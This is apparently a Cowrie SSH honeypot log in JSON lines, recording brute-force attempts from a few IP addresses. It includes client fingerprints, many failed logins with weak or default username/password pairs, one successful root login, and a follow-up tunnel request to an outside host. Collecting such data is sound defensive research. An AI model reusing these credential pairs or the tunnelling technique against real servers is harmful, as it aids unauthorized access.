{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:16:21.877258Z","src_ip":"212.227.125.160","session":"838dcf9216b3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"111111","message":"login attempt [ftpuser/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:16:22.457748Z","src_ip":"212.227.125.160","session":"838dcf9216b3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:16:23.648142Z","src_ip":"212.227.125.160","session":"838dcf9216b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44026,"dst_ip":"1.2.3.4","dst_port":22,"session":"380a8e5684cd","protocol":"ssh","message":"New connection: 212.227.125.160:44026 (1.2.3.4:22) [session: 380a8e5684cd]","sensor":"my-vps","timestamp":"2025-08-28T12:17:02.760228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:17:02.767509Z","src_ip":"212.227.125.160","session":"380a8e5684cd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:17:02.947776Z","src_ip":"212.227.125.160","session":"380a8e5684cd"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567","message":"login attempt [ftpuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:03.652450Z","src_ip":"212.227.125.160","session":"380a8e5684cd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:17:04.879294Z","src_ip":"212.227.125.160","session":"380a8e5684cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27258,"dst_ip":"1.2.3.4","dst_port":22,"session":"42272fb987f7","protocol":"ssh","message":"New connection: 212.227.235.229:27258 (1.2.3.4:22) [session: 42272fb987f7]","sensor":"my-vps","timestamp":"2025-08-28T12:17:07.859409Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:17:07.860578Z","src_ip":"212.227.235.229","session":"42272fb987f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27592,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ce7e5248b4","protocol":"ssh","message":"New connection: 212.227.235.229:27592 (1.2.3.4:22) [session: 06ce7e5248b4]","sensor":"my-vps","timestamp":"2025-08-28T12:17:08.021548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:17:08.022545Z","src_ip":"212.227.235.229","session":"06ce7e5248b4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T12:17:08.186542Z","src_ip":"212.227.235.229","session":"06ce7e5248b4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:17:08.669831Z","src_ip":"212.227.235.229","session":"06ce7e5248b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T12:17:08.831811Z","session":"06ce7e5248b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59893,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd65b4e91fd1","protocol":"ssh","message":"New connection: 212.227.235.229:59893 (1.2.3.4:22) [session: bd65b4e91fd1]","sensor":"my-vps","timestamp":"2025-08-28T12:17:25.871992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Renci.SshNet.SshClient.0.0.1","message":"Remote SSH version: SSH-2.0-Renci.SshNet.SshClient.0.0.1","sensor":"my-vps","timestamp":"2025-08-28T12:17:25.872946Z","src_ip":"212.227.235.229","session":"bd65b4e91fd1"}
{"eventid":"cowrie.client.kex","hassh":"d7ef57bfcf13ebeb41532c4ed0094994","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,blowfish-cbc,twofish-cbc,twofish192-cbc,twofish128-cbc,twofish256-cbc,arcfour,arcfour128,arcfour256,cast128-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-512-96,hmac-sha2-256-96,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-md5-96-etm@openssh.com;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","blowfish-cbc","twofish-cbc","twofish192-cbc","twofish128-cbc","twofish256-cbc","arcfour","arcfour128","arcfour256","cast128-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-512-96","hmac-sha2-256-96","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-md5-96-etm@openssh.com"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: d7ef57bfcf13ebeb41532c4ed0094994","sensor":"my-vps","timestamp":"2025-08-28T12:17:25.954391Z","src_ip":"212.227.235.229","session":"bd65b4e91fd1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Grandstream1","message":"login attempt [admin/Grandstream1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:26.201305Z","src_ip":"212.227.235.229","session":"bd65b4e91fd1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:17:27.284891Z","src_ip":"212.227.235.229","session":"bd65b4e91fd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51547,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc8aa600df30","protocol":"ssh","message":"New connection: 212.227.125.160:51547 (1.2.3.4:22) [session: fc8aa600df30]","sensor":"my-vps","timestamp":"2025-08-28T12:17:37.873278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:17:37.874578Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:17:37.954795Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"k3s601","message":"login attempt [admin/k3s601] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:38.359095Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"net02net","message":"login attempt [admin/net02net] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:39.441677Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1212","message":"login attempt [admin/1212] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:40.524915Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45010,"dst_ip":"1.2.3.4","dst_port":22,"session":"24ba7f30c598","protocol":"ssh","message":"New connection: 212.227.125.160:45010 (1.2.3.4:22) [session: 24ba7f30c598]","sensor":"my-vps","timestamp":"2025-08-28T12:17:41.440663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:17:41.443260Z","src_ip":"212.227.125.160","session":"24ba7f30c598"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:17:41.603760Z","src_ip":"212.227.125.160","session":"24ba7f30c598"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:41.607309Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:42.345756Z","src_ip":"212.227.125.160","session":"24ba7f30c598"}
{"eventid":"cowrie.login.failed","username":"admin","password":"51Dd7DRv5i2X","message":"login attempt [admin/51Dd7DRv5i2X] failed","sensor":"my-vps","timestamp":"2025-08-28T12:17:42.689867Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:17:43.526519Z","src_ip":"212.227.125.160","session":"24ba7f30c598"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:17:43.790351Z","src_ip":"212.227.125.160","session":"fc8aa600df30"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:18:18.022204Z","src_ip":"212.227.235.229","session":"06ce7e5248b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42846,"dst_ip":"1.2.3.4","dst_port":22,"session":"d92e21592db2","protocol":"ssh","message":"New connection: 212.227.125.160:42846 (1.2.3.4:22) [session: d92e21592db2]","sensor":"my-vps","timestamp":"2025-08-28T12:18:21.206378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:18:21.207244Z","src_ip":"212.227.125.160","session":"d92e21592db2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:18:21.384416Z","src_ip":"212.227.125.160","session":"d92e21592db2"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:18:22.058367Z","src_ip":"212.227.125.160","session":"d92e21592db2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:18:23.450427Z","src_ip":"212.227.125.160","session":"d92e21592db2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59088,"dst_ip":"1.2.3.4","dst_port":22,"session":"2530e1c27a33","protocol":"ssh","message":"New connection: 217.72.205.35:59088 (1.2.3.4:22) [session: 2530e1c27a33]","sensor":"my-vps","timestamp":"2025-08-28T12:18:28.149555Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:18:28.151752Z","src_ip":"217.72.205.35","session":"2530e1c27a33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45210,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f52f4e3365","protocol":"ssh","message":"New connection: 212.227.125.160:45210 (1.2.3.4:22) [session: c7f52f4e3365]","sensor":"my-vps","timestamp":"2025-08-28T12:19:00.789228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:19:00.789939Z","src_ip":"212.227.125.160","session":"c7f52f4e3365"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:19:00.974605Z","src_ip":"212.227.125.160","session":"c7f52f4e3365"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456789","message":"login attempt [mysql/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:19:01.662771Z","src_ip":"212.227.125.160","session":"c7f52f4e3365"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:19:02.838402Z","src_ip":"212.227.125.160","session":"c7f52f4e3365"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43260,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e7465fd63d0","protocol":"ssh","message":"New connection: 212.227.125.160:43260 (1.2.3.4:22) [session: 7e7465fd63d0]","sensor":"my-vps","timestamp":"2025-08-28T12:19:36.869586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:19:36.871114Z","src_ip":"212.227.125.160","session":"7e7465fd63d0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:19:36.979973Z","src_ip":"212.227.125.160","session":"7e7465fd63d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52862,"dst_ip":"1.2.3.4","dst_port":22,"session":"36c701840731","protocol":"ssh","message":"New connection: 212.227.125.160:52862 (1.2.3.4:22) [session: 36c701840731]","sensor":"my-vps","timestamp":"2025-08-28T12:19:41.786419Z"}
